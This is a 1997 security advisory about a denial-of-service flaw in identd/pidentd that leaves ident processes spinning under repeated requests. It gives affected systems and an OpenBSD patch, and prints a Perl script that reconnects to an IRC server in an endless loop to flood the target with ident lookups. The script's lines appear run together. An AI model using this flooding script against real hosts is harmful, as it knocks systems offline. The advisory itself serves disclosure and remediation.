CPSR #8: identd Denial of Service

Corinne Posse Releases (releases@CORINNE.MAC.EDU)
Mon, 04 Aug 1997 09:19:54 -0500

************** Corinne Posse Security Notice **************
Issue Number 8: 970803
************** http://posse.cpio.org **************

**** Denial of Service care of identd ****

A massive amount of authorization requests to identd (pidentd and others)
can cause system load to skyrocket, making the system unusable.

Affected Sites:
FreeBSD, NetBSD, Linux, SCO, Solaris, IRIX, and OpenBSD prior to 8/1/97.
ANY system running pidentd.

Problem:
A massive amount of ident requests causes the identd daemon to "spin"
because the daemon does not correctly close the socket from the host
that issues a request. This is due to a poorly implemented incantation
of wait(). The improper code perpetuates the identd process and allows
the process to hang, slowing system performance considerably. On average,
2-3 spinning processes slow the system noticeably-- 10-15 make the system
unusable. Bear in mind that this is all based on the speed of the system
and the above numbers hold true for machines like a p5/100 with 32M of RAM.
Simply "kill -9 (ident's PIDs)" fixes the problem if it occurs.

Fix:
Thanks to Theo de Raadt of the OpenBSD project, we are proud to announce
that OpenBSD has fixed this problem, and that the following patches
are available. OpenBSD uses a modified version of pidentd.

Index: libexec/identd/identd.c
===================================================================
RCS file: /cvs/src/libexec/identd/identd.c,v
retrieving revision 1.4
retrieving revision 1.5
diff -r1.4 -r1.5
2c2
< ** $Id: identd.c,v 1.4 1997/07/23 20:36:27 kstailey Exp $

---
> **    $Id: identd.c,v 1.5 1997/07/29 07:49:31 deraadt Exp $
180a181
>   int save_errno = errno;
184a186
>   errno = save_errno;

Exploit: This problem was discovered simultaneously by Jack0 as well as Jonathan Katz. Jack0 noticed that a user's repeated requests to an IRC server spawned many identd processes on his local machine, bringing his box to a crawl. Jon noticed that after someone sent email to the various mailing lists he runs, the many hosts receiving the mail would make ident requests and leave his system paralyzed. To see if your system is vulnerable, Jack0 has come up with a PERL script that repeatedly tries to connect to an IRC server. With a little tinkering, the script can be used to adapt to a variety of different services if you want or need to test other services.

#!/usr/bin/perl # Ident abuse script which can be used to test for the identd vulnerability # on the local system. # jack0@cpio.org for questions

#include <Socket.pm> use Socket; my($h,$p,$in_addr,$proto,$addr); $h = "$ARGV[0]"; $p = 6667 if (!$ARGV[1]); if (!$h) { print "Host name most be specified i.e.,; some.server.net\n"; } $in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); $proto = getprotobyname('tcp'); &connect;

sub connect { print "Connection in progress:\n"; socket(S, AF_INET, SOCK_STREAM, $proto) or die $!; connect(S,$addr) or die $!; select S; $| = 1; print "QUIT\n"; select STDOUT; close S; &connect; }

Concept by: Jack0 (jack0@cpio.org) and Jonathan Katz (jkatz@cpio.org) Special Thanks To: Theo de Raadt